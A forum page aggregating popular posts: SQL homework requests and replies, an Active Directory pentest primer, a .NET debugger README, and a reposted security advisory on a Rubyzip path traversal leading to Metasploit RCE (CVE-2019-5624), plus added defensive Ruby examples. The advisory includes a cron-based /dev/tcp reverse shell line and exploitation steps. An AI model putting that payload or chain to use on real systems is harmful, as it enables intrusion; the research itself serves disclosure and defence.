Leaderboard

Popular Content

Showing content with the highest reputation on 04/28/19 in all areas

  1. These exercises are a bit like "today we learn addition: one apple plus one more makes two; how many apples are there in total if I add another two?" To stay on topic: 1. get current date, get day of week, CASE example; 2. user-defined functions. If you intend to work in IT someday, I suggest a bit more attention and curiosity toward the courses and the course materials.
    2 points
  2. I post very rarely these days, and do you know why? Because of people like you. Or, come to think of it, thanks to people like you. Your main problem is that you want respect. I don't know how old you are, but if you're over 14 you should already know that respect is earned, not demanded. Or, to stay within the "theme" of this thread, "not begged for". Now back to the problem. You came here to ask for help. Why do you care what "x" or "y" says? Will you solve your problem by bickering with someone here? Or do you think that if you don't answer them, you're a bigger sucker? When you need help, the main thing that should characterize you is humility. Otherwise others will give you a hard time and you'll be left with both the problem unsolved and the time wasted. And if you have two jobs, a car and an apartment, you should know the value of time. Speaking of time, I hope I haven't wasted mine writing to you, and maybe next time you'll show more intelligence. You have to understand that a forum is a place where people come and take minutes/hours out of their lives so that people like you, and often like me when I needed it, can understand certain concepts and get help. P.S.: I don't want to be a troll, but it also seems to me that everyone is piling on you.
    2 points
  3. And you created an account specifically to say this? I see.
    1 point
  4. I'll invoice you if you want me to help; until then, get out of here.
    1 point
  5. Exploring, Exploiting Active Directory Pen Test
Posted on April 20, 2019 by Rajasekar A

Active Directory (Pen Test) is most commonly used in the Enterprise Infrastructure to manage 1000s of computers in the organization with a single point of control, the "Domain Controller". Performing Penetration Testing of Active Directory is more interesting, and it is mainly targeted by many APT Groups with a lot of different techniques. We will focus on the basics of Active Directory to understand its components before the attack.

Understanding the Active Directory and its Components

Directory Service: A Directory Service is a hierarchical structure which maps the names of all resources in the network to their network addresses. It allows storing, organizing and managing all the network resources and defines a naming structure. It makes it easier to manage all the devices from a single system.

Active Directory: Active Directory is a Microsoft implementation of Directory Services. It follows the X.500 specification and it works on the application layer of the OSI model. It allows administrators to control all the users and resources in the network from a single server. It stores information about all the users and resources in the network in a single database, the Directory Service Database. Active Directory uses "Kerberos" for authentication of the users and LDAP for retrieving the directory information.

Domain Controller (DC): A Domain Controller is a Windows Server running Active Directory Directory Services in a domain. All the users, users' information, computers and their policies are controlled by a Domain Controller. Every user must authenticate with the "Domain Controller" to access any resource or service in a domain. It defines the policies for all the users: what actions can be performed, what level of privileges is to be granted, etc. It makes the life of administrators easy to manage the users and the computers in the network.

Naming Conventions in AD:

An Object can be any network resource in the Active Directory Domain. These objects can be Computers, Users, printers etc.

A Domain is a logical grouping of objects in the organization. It defines the security boundary and allows objects within the boundary to share data among each other. It stores information about all the objects within the domain in the domain controller.

A Tree is a collection of one or more domains. All domains within a single tree share a common schema and Global Catalogue, which is a central repository of information about all the objects.

A Forest is a collection of one or more trees which share a common Directory Schema, Global Catalogue and Configuration across the organization.

Kerberos Authentication: Kerberos is an authentication protocol which is used for Single Sign-On (SSO) purposes. The concept of SSO is to authenticate once and use the token to access any service for which you are authorized. The Kerberos Authentication Process is as follows:

Step 1: The User sends an "Authentication Service Request (AS_REQ)" to the "Key Distribution Centre" (KDC) for a "Ticket Granting Ticket (TGT)" with the "User Principal Name (UPN)" and the current Timestamp, which is encrypted with the User's password.

Step 2: The KDC decrypts the request (AS_REQ) with the local copy of the User's password stored in the database and checks the UPN and Timestamp. After verification, it will respond with a reply (AS_REP). It has two levels of encryption: one is the TGT, which is encrypted with the KDC's password, and the second is the Session Key along with the expiry Timestamp, encrypted with the hash of the user's password.

Step 3: Now the User's machine will cache the TGT and Session Key. This TGT is used when requesting a service. The session key is used for further communication with the KDC, which does not require credentials. All the resources in the domain are available as a service and require a service ticket for the same.

Step 4: Now the User's Machine sends a request (TGS_REQ) to the KDC for a Ticket Granting Service (TGS) along with the TGT, the Service Principal Name (SPN), which contains the name of the service and its IP Address and port number, and a Timestamp which is encrypted with the session key received in Step 2.

Step 5: The KDC will decrypt the request with the User's Session Key and check the SPN, Timestamp and TGT, which is encrypted with the KDC password. If all the details are valid, it will send a reply (TGS_REP) with the TGS encrypted with the password hash of the service provider and the Ticket Expiry Timestamp encrypted with the AS_REP Session key.

Step 6: The User's machine will decrypt the request with the session key and extract the TGS ticket. The User's Machine will forward this ticket to the Application as an AP_REQ; the application decrypts the request with its password and extracts the session key and other attributes about the client regarding privileges and groups. It verifies these details and grants access to the application. This is the total process of the Kerberos authentication implemented in Active Directory.

Attacks on Kerberos:

Silver Tickets are the Ticket Granting Service (TGS) tickets obtained from the KDC; they can be forged and are effectively cracked offline to compromise the service machine.

Golden Tickets are the Ticket Granting Ticket (TGT) obtained from the KDC in the AS_REP. It can be forged and cracked offline to compromise the KDC.

Roasting AS-REP can be performed when the server disables DONT_REQ_PREAUTH; an attacker can request the KDC on behalf of the machine and crack the password offline.

LDAP is the Lightweight Directory Access Protocol, which acts as a communication protocol that defines the methods for accessing the directory services in a domain. It defines the way that data should be presented to the users; it includes various components such as Attributes, Entries, and the Directory Information Tree.

Reconnaissance: SPN Scanning instead of Port Scanning of all the machines. Active Directory can be enumerated in multiple ways, as follows:
Active Directory can be enumerated even without a Domain Account.
Active Directory can be enumerated to gather all the Domain and Forest Information, Forest and Domain Trusts and many more things without Admin Rights.
Active Directory can be enumerated to retrieve Privileged accounts and Access Rights of all groups using PowerView.

Attacks on AD:
PassTheHash: It is a technique used to pass the NTLM hash of a service to the remote server to log in rather than a plain text password.
PassTheCache: Passing the cached credentials of Linux/Unix-based systems which are part of the domain to Windows-based machines to gain access to the system.
Over-Pass-The-Hash: An obtained NTLM hash can be passed to the KDC to grab a valid Kerberos ticket and pass it to another system to gain access.

Maintaining Access in the Domain:
DCSync: Requires Domain Admin or Enterprise Admin permission and pulls all the password data to sync with another malicious and stay in the domain.
DCShadow: Allows registering a new domain to add new objects into the targeted infrastructure.

There are many more attacks that can be performed to compromise the objects in the Enterprise Active Directory infrastructure. I have listed the most commonly performed attacks. I have covered the basics of Active Directory and the conventions which are necessary to learn before going for pen testing. In the next article, I will explain these attacks in detail with practical scenarios.

Image Ref: https://redmondmag.com/articles/2012/02/01/~/media/ECG/redmondmag/Images/2012/02/0212red_Kerberos_Fig1.ashx
Source: http://blog.securelayer7.net/exploring-exploiting-active-directory-pen-test/
    1 point
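The six Kerberos steps above, as an added example that is not part of the reposted article: a toy KDC, client and service in one Ruby process, with AES-GCM standing in for Kerberos encryption types and every account, key and SPN constructed for the demo. It keeps pre-authentication mandatory, so the KDC refuses to answer an AS_REQ (or rejects it) unless the requester proves knowledge of the user key with a fresh sealed timestamp.

```ruby
require 'openssl'
require 'json'
# Long-term key stand-in (real Kerberos derives it from the password).
def key_from(password)
  OpenSSL::Digest.digest('SHA256', password)
end
# AES-256-GCM "box" used for every encrypted part; opening a box with the
# wrong key makes #final raise OpenSSL::Cipher::CipherError.
def seal(key, data)
  c = OpenSSL::Cipher.new('aes-256-gcm').encrypt
  c.key = key
  iv = c.random_iv
  { iv: iv, ct: c.update(JSON.generate(data)) + c.final, tag: c.auth_tag }
end

def unseal(key, box)
  c = OpenSSL::Cipher.new('aes-256-gcm').decrypt
  c.key = key
  c.iv = box[:iv]
  c.auth_tag = box[:tag]
  JSON.parse(c.update(box[:ct]) + c.final)
end

KDC_KEY  = key_from('krbtgt-secret')                       # constructed
USERS    = { 'alice@CORP.LOCAL' => key_from('alice-pw') }  # constructed
SERVICES = { 'cifs/fs01' => key_from('fs01-machine-pw') }  # constructed
SKEW, LIFETIME = 300, 36_000                               # seconds

# Steps 1-2: AS_REQ = UPN + timestamp sealed with the user key (pre-auth);
# AS_REP = TGT sealed with the KDC key + session key sealed with the user key.
# Pre-auth is mandatory here: nothing keyed to the user leaves the KDC first.
def as_exchange(upn, preauth, now)
  ukey = USERS.fetch(upn)
  raise 'KDC_ERR_PREAUTH_REQUIRED' if preauth.nil?
  raise 'KDC_ERR_PREAUTH_FAILED' if (now - unseal(ukey, preauth)['ts']).abs > SKEW
  skey = OpenSSL::Random.random_bytes(32).unpack1('H*')   # hex so it fits in JSON
  { tgt: seal(KDC_KEY, { 'upn' => upn, 'skey' => skey, 'exp' => now + LIFETIME }),
    enc_part: seal(ukey, { 'skey' => skey, 'exp' => now + LIFETIME }) }
end

# Steps 4-5: TGS_REQ = TGT + SPN + timestamp sealed with the session key;
# TGS_REP = service ticket sealed with the service key + part for the client.
def tgs_exchange(tgt, spn, authenticator, now)
  t = unseal(KDC_KEY, tgt)                   # only the KDC can open a TGT
  raise 'KRB_AP_ERR_TKT_EXPIRED' if t['exp'] < now
  skey = [t['skey']].pack('H*')
  raise 'KRB_AP_ERR_BAD_INTEGRITY' if (now - unseal(skey, authenticator)['ts']).abs > SKEW
  svc_skey = OpenSSL::Random.random_bytes(32).unpack1('H*')
  { ticket: seal(SERVICES.fetch(spn), { 'upn' => t['upn'], 'skey' => svc_skey }),
    enc_part: seal(skey, { 'skey' => svc_skey }) }
end

# Step 6: the service opens the ticket with its own key and learns the client UPN.
def ap_request(spn, ticket)
  unseal(SERVICES.fetch(spn), ticket)['upn']
end

# Whole client-side flow; returns the UPN the service ends up trusting.
def client_login(upn, password, spn, now = Time.now.to_i)
  ukey = key_from(password)
  as   = as_exchange(upn, seal(ukey, { 'ts' => now }), now)
  skey = [unseal(ukey, as[:enc_part])['skey']].pack('H*')
  tgs  = tgs_exchange(as[:tgt], spn, seal(skey, { 'ts' => now }), now)
  ap_request(spn, tgs[:ticket])
end
```

A wrong password surfaces as a decryption failure at the pre-authentication step, before any AS_REP exists; a stale timestamp is rejected by the skew check, which is the property that makes replaying a captured AS_REQ useless.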
  6. Debugger for .NET Core runtime
The debugger provides the GDB/MI or VSCode Debug Adapter protocol and allows debugging .NET apps under the .NET Core runtime.

Build

Switch to the netcoredbg directory, create a build directory and switch into it:

    mkdir build
    cd build

Proceed to build with cmake. Necessary dependencies (CoreCLR sources and .NET SDK binaries) are going to be downloaded during the CMake configure step. It is possible to override them with the CMake options -DCORECLR_DIR=<path-to-coreclr> and -DDOTNET_DIR=<path-to-dotnet-sdk>.

Ubuntu:

    CC=clang CXX=clang++ cmake .. -DCMAKE_INSTALL_PREFIX=$PWD/../bin

macOS:

    cmake .. -DCMAKE_INSTALL_PREFIX=$PWD/../bin

Windows:

    cmake .. -G "Visual Studio 15 2017 Win64" -DCMAKE_INSTALL_PREFIX="$pwd\..\bin"

Compile and install:

    cmake --build . --target install

Run

The above commands create a bin directory with the netcoredbg binary and additional libraries. Now running the debugger with the --help option should look like this:

    $ ../bin/netcoredbg --help
    .NET Core debugger
    Options:
    --attach <process-id>                 Attach the debugger to the specified process id.
    --interpreter=mi                      Puts the debugger into MI mode.
    --interpreter=vscode                  Puts the debugger into VS Code Debugger mode.
    --engineLogging[=<path to log file>]  Enable logging to VsDbg-UI or file for the engine. Only supported by the VsCode interpreter.
    --server[=port_num]                   Start the debugger listening for requests on the specified TCP/IP port instead of stdin/out. If port is not specified TCP 4711 will be used.

Source: https://github.com/Samsung/netcoredbg
    1 point
  7. On insecure zip handling, Rubyzip and Metasploit RCE (CVE-2019-5624)
24 Apr 2019 - Posted by Luca Carettoni

During one of our projects we had the opportunity to audit a Ruby-on-Rails (RoR) web application handling zip files using the Rubyzip gem. Zip files have always been an interesting entry-point to triggering multiple vulnerability types, including path traversals and symlink file overwrite attacks. As the library under testing had symlink processing disabled, we focused on path traversal exploitation. This blog post discusses our results, the "bug" discovered in the library itself and the implication of such an issue in a popular piece of software - Metasploit.

Rubyzip and old vulnerabilities

The Rubyzip gem has a long history of path traversal vulnerabilities (1, 2) through malicious filenames. Particularly interesting was the code change in PR #376 where a different handling was implemented by the developers.

    # Extracts entry to file dest_path (defaults to @name).
    # NB: The caller is responsible for making sure dest_path is safe,
    # if it is passed.
    def extract(dest_path = nil, &block)
      if dest_path.nil? && !name_safe?
        puts "WARNING: skipped #{@name} as unsafe"
        return self
      end
      [...]

Entry#name_safe is defined a few lines before as:

    # Is the name a relative path, free of `..` patterns that could lead to
    # path traversal attacks? This does NOT handle symlinks; if the path
    # contains symlinks, this check is NOT enough to guarantee safety.
    def name_safe?
      cleanpath = Pathname.new(@name).cleanpath
      return false unless cleanpath.relative?
      root = ::File::SEPARATOR
      naive_expanded_path = ::File.join(root, cleanpath.to_s)
      cleanpath.expand_path(root).to_s == naive_expanded_path
    end

In the code above, if the destination path is passed to the Entry#extract function then it is not actually checked. A comment in the source code of that function highlights the user's responsibility:

    # NB: The caller is responsible for making sure dest_path is safe, if it is passed.

While Entry#name_safe is a fair check against path traversals (and absolute paths), it is only executed when the function is called without arguments. In order to verify the library bug we generated a ZIP PoC using the old (and still good) evilarc, and extracted the malicious file using the following code:

    require 'zip'

    first_arg, *the_rest = ARGV

    Zip::File.open(first_arg) do |zip_file|
      zip_file.each do |entry|
        puts "Extracting #{entry.name}"
        entry.extract(entry.name)
      end
    end

    $ ls /tmp/file.txt
    ls: cannot access '/tmp/file.txt': No such file or directory
    $ zipinfo absolutepath.zip
    Archive:  absolutepath.zip
    Zip file size: 289 bytes, number of entries: 2
    drwxr-xr-x  2.1 unx        0 bx stor 18-Jun-13 20:13 /tmp/
    -rw-r--r--  2.1 unx        5 bX defN 18-Jun-13 20:13 /tmp/file.txt
    2 files, 5 bytes uncompressed, 7 bytes compressed:  -40.0%
    $ ruby Rubyzip-poc.rb absolutepath.zip
    Extracting /tmp/
    Extracting /tmp/file.txt
    $ ls /tmp/file.txt
    /tmp/file.txt

Resulting in a file being created in /tmp/file.txt, which confirms the issue. As happened with our client, most developers might have upgraded to Rubyzip 1.2.2 thinking it was safe to use without actually verifying how the library works or its specific usage in the codebase. It would have been vulnerable anyway ¯\_(ツ)_/¯

In the context of our web application, the user-supplied zip was decompressed through the following (pseudo) code:

    def unzip(input)
      uuid = get_uuid()
      # 0. create a 'Pathname' object with the new uuid
      parent_directory = Pathname.new("#{ENV['uploads_dir']}/#{uuid}")
      Zip::File.open(input[:zip_file].to_io) do |zip_file|
        zip_file.each_with_index do |entry, index|
          # 1. check the file is not present
          next if File.file?(parent_directory + entry.name)
          # 2. extract the entry
          entry.extract(parent_directory + entry.name)
        end
      end
      Success
    end

In item #0 we can see that a Pathname object is created and then used as the destination path of the decompressed entry in item #2. However, the sum operator between objects and strings does not work as many developers would expect and might result in unintended behavior. We can easily understand its behavior in an IRB shell:

    $ irb
    irb(main):001:0> require 'pathname'
    => true
    irb(main):002:0> parent_directory = Pathname.new("/tmp/random_uuid/")
    => #<Pathname:/tmp/random_uuid/>
    irb(main):003:0> entry_path = Pathname.new(parent_directory + File.dirname("../../path/traversal"))
    => #<Pathname:/path>
    irb(main):004:0> destination_folder = Pathname.new(parent_directory + "../../path/traversal")
    => #<Pathname:/path/traversal>
    irb(main):005:0> parent_directory + "../../path/traversal"
    => #<Pathname:/path/traversal>

Thanks to the interpretation of the ../ by Pathname, the argument to Rubyzip's Entry#extract call does not contain any path traversal payloads, which results in a mistakenly supposed "safe" path. Since the gem does not perform any validation, the exploitation does not even require this unexpected path concatenation.

From Arbitrary File Write to RCE (RoR Style)

Apart from the usual *nix and Windows specific techniques (like writing a new cronjob or exploiting custom scripts), we were interested in understanding how we could leverage this bug to achieve RCE in the context of a RoR application. Since our target was running in production environments, RoR classes were cached on first usage via the cache_classes directive. During the time allocated for the engagement we didn't find a reliable way to load/inject arbitrary code at runtime via file write without requiring a RoR reboot. However, we did verify in a local testing environment that chaining together a Denial of Service vulnerability and a full path disclosure of the web app root can be used to trigger the web server reboot and achieve RCE via the aforementioned zip handling vulnerability. The official documentation explains that:

    After it loads the framework plus any gems and plugins in your application, Rails turns to loading initializers. An initializer is any file of ruby code stored under /config/initializers in your application. You can use initializers to hold configuration settings that should be made after all of the frameworks and plugins are loaded.

Using this feature, an attacker with the right privileges can add a malicious .rb in the /config/initializers folder which will be loaded at web server (re)boot.

Attacking the attackers. Metasploit Authenticated RCE (CVE-2019-5624)

Just after the end of the engagement and with the approval of our customer, we started looking at popular software that was likely affected by the Rubyzip bug. As we were brainstorming potential targets, an icon on one of our VMs caught our attention: Metasploit Framework

Going through the source code, we were able to quickly identify several files that are using the Rubyzip library to create ZIP files. Since our vulnerability resides in the extract function, we recalled an option to import a ZIP workspace from previous MSF versions or from different instances. We identified the corresponding code path in the zip.rb file (line 157) that is responsible for importing a Metasploit ZIP File:

    data.entries.each do |e|
      target = ::File.join(@import_filedata[:zip_tmp], e.name)
      data.extract(e,target)

As for the vanilla Rubyzip example, creating a ZIP file containing a path traversal payload and embedding a valid MSF workspace (an XML file containing the exported info from a scan) made it possible to obtain a reliable file-write primitive. Since the extraction is done as root, we could easily obtain remote command execution with high privileges using the following steps:

Create a file with the following content:

    * * * * * root /bin/bash -c "exec /bin/bash 0</dev/tcp/172.16.13.144/4444 1>&0 2>&0 0<&196;exec 196<>/dev/tcp/172.16.13.144/4445; bash <&196 >&196 2>&196"

Generate the ZIP archive with the path traversal payload:

    python evilarc.py exploit --os unix -p etc/cron.d/

Add a valid MSF workspace to the ZIP file (in order to have MSF extract it, otherwise it will refuse to process the ZIP archive).
Set up two listeners, one on port 4444 and the other on port 4445 (the one on port 4445 will get the reverse shell).
Log in to the MSF Web Interface.
Create a new "Project".
Select "Import", "From file", choose the evil ZIP file and finally click the "Import" button.
Wait for the import process to finish.
Enjoy your reverse shell.

Conclusions

In case you are using Rubyzip, check the library usage and perform additional validation against the entry name and the destination path before calling Entry#extract. Here is a small recap of the different scenarios (as of Rubyzip v1.2.2):

    Usage                  Input by user?                     Vulnerable to path traversal?
    entry.extract(path)    yes (path)                         yes
    entry.extract(path)    partially (path is concatenated)   maybe
    entry.extract()        partially (entry name)             no
    entry.extract()        no                                 no

If you're using Metasploit, it is time to patch. We look forward to seeing a msf module for CVE-2019-5624.

Credits and References

Credit for the research and bugs go to @voidsec and @polict. This work has been performed during a customer engagement and Doyensec 25% Research Time. As such, we would like to thank our customer and Metasploit maintainers for their support.

If you're interested in the topic, take a look at the following resources:
Rubyzip Library
Ruby on Rails Guides
Attacking Ruby on Rails Applications
1997 Portable BBS Hacking (or when Zip Slip was actually invented)
Evilarc blog post (or 2019 and this post is still relevant)

Source: https://blog.doyensec.com/2019/04/24/rubyzip-bug.html
    1 point
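The destination-path validation the conclusions ask for, as an added example that is neither the Doyensec post's code nor part of the Rubyzip gem: it reproduces the `parent + entry.name` concatenation from the vulnerable unzip routine, normalises the result and only accepts it when it still lies under the parent directory. The parent directory and the entry names are constructed, and rubyzip itself is not loaded so the check can run on its own; in an application it would be called once per entry and its result passed to Entry#extract.

```ruby
require 'pathname'

# Absolute path the entry would be written to, or nil if it would leave
# parent_dir. The concatenation is the same `parent + entry.name` as in the
# vulnerable code; the difference is that the result is normalised and then
# required to sit under parent. Symlinks already present under parent_dir
# are not covered here, just as they are not by Entry#name_safe?.
def safe_destination(parent_dir, entry_name)
  parent = Pathname.new(parent_dir).expand_path
  dest   = (parent + entry_name).expand_path
  inside = dest == parent || dest.to_s.start_with?(parent.to_s + File::SEPARATOR)
  inside ? dest : nil
end

# What the vulnerable `parent_directory + entry.name` actually produced:
# Pathname#+ folds a leading "../" into the base and drops the base entirely
# for an absolute name, which is why the IRB session above ends in /path.
def naive_destination(parent_dir, entry_name)
  (Pathname.new(parent_dir) + entry_name).to_s
end

# Split entry names into those that may be handed to Entry#extract and those
# that must be skipped (or make the whole archive be rejected, per policy).
def triage(parent_dir, entry_names)
  entry_names.partition { |name| safe_destination(parent_dir, name) }
end

# Constructed entry names modelled on the evilarc and absolutepath.zip cases.
SAMPLE_ENTRIES = [
  'report/scan.xml',            # plain relative path
  '../../etc/cron.d/exploit',   # leading "../" traversal
  '/tmp/file.txt',              # absolute name, as in absolutepath.zip
  'uploads/../sibling.txt',     # "../" in the middle that stays inside
  'a/b/../../../escape'         # "../" in the middle that climbs out
].freeze
```

Note that `uploads/../sibling.txt` is accepted: after normalisation it stays inside the parent, which is the behaviour a prefix check on the normalised path gives, whereas a check that rejects any `..` substring would also refuse it.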
  8. Download: Buy: You can leave a donation here: https://fundatiamereuaproape.ro/donatii-in-cont/ (PayPal link at the top of the page or bank transfer details at the bottom)
    1 point
  9. Just asking, out of curiosity: What have you tried? Did you read the course materials? Did you search on Google/DuckDuckGo/Bing/<other_search_engine_names_here>? For which SQL variant should it be implemented (PostgreSQL, MySQL, MSSQL, Oracle, etc.)?
    1 point
  10. Brother. Does it have Slingshot Linux?
    0 points
  11. I have a funny story... once I was on the internet looking at https://flatfy.ro/case-de-vanzare-bucuresti because I wanted to buy a house. Anyway, I was browsing around and suddenly I saw that someone wanted to sell a house with a ghost as a bonus. Supposedly it could be seen in mirrors and moved things around. I was really scared, but afterwards it seemed very funny to me.
    -1 points
  12. Hello. I have two SQL problems to solve and I can't figure them out at all. I'm a beginner and I would need help solving them. 1. Write a CASE statement which, for each separate day of the week, can return the name of the day, and which when executed returns the name of the current day. 2. Write a user-defined function which, for a given date, returns the ordinal number of the day within the week.
    -1 points